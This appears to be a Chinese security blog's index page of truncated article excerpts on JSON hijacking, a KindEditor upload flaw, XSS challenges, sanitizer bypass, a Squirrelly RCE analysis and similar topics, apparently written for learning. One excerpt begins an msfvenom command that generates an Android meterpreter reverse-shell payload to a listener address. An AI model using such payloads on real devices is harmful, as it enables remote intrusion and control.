form表单截图样式 form表单中input123456789101112131415161718192021222324252627282930313233343536373839<!DOC...
【Json劫持】Json的劫持原理
前言 Json劫持形式 Json劫持当前目录创建三个文件 然后json.php中写入 123456789101112<?php/*# -*- coding: utf-8 -*-# @Author...
kindeditor<=4.1.5上传漏洞复现
0x00 漏洞描述漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中 这里h...
XSS闯关小游戏
一个XSS小游戏闯关平台 level112345678910111213141516171819202122232425<!DOCTYPE html><!--STATUS OK--&...
kindeditor<=4.1.5上传漏洞复现
漏洞描述 漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中 这里html里...
LEXSS: 绕过词法解析过程中的安全机制 - mss****
通过使用基于HTML解析逻辑的特殊HTML标签,可以实现跨站脚本(XSS)攻击,即使在使用词法解析器过滤危险内容的情况下也是如此。利用这些类型的XSS漏洞的主要目标,就是让净化型词法解析器将数据视为文...
记一次 getshell 过程 - yuyan
前言 兜兜转转最终拿到了 shell ,但是发现大佬已经在前一个小时 getshell 了,记录一下我是怎么发现的过程,也做一下自我反思。 过程 打开网站查看源代码,发现成功登录后会跳转到 f0.ht...
Python学习之路初探exp
学习了poc和exp,好玩儿。。。还没怎么学好只能拿自己的靶场试试水。如有问题请大佬多多指教,笔芯芯♥~0x00 POC概念POC (Proof of Concept), 直译为“概念证明”,百度百科...
Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析
文章首发于先知社区作者:WHOAMI漏洞概述漏洞复现环境搭建漏洞验证漏洞分析renderFilegetConfigtryHandleCachehandleCachecompilecompileToSt...
我用一根网线,控制了整栋楼的网络
作者:EtherDream链接:https://www.cnblogs.com/index-html/p/4344082.html刚上大学没多久,就遇到件头疼事。富二代们刚来就带着笔记本电脑,这让咱们...
简易证书查询
点击蓝字 关注我们01开发环境Windows 10 专业版、Visual Studio 2017、.NET Framework 4.6、bootstrap3.3.702主要设计本程序无需数...
利用msf框架对安卓手机进行简单操作
测试机型红米k30 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 R > vir...
31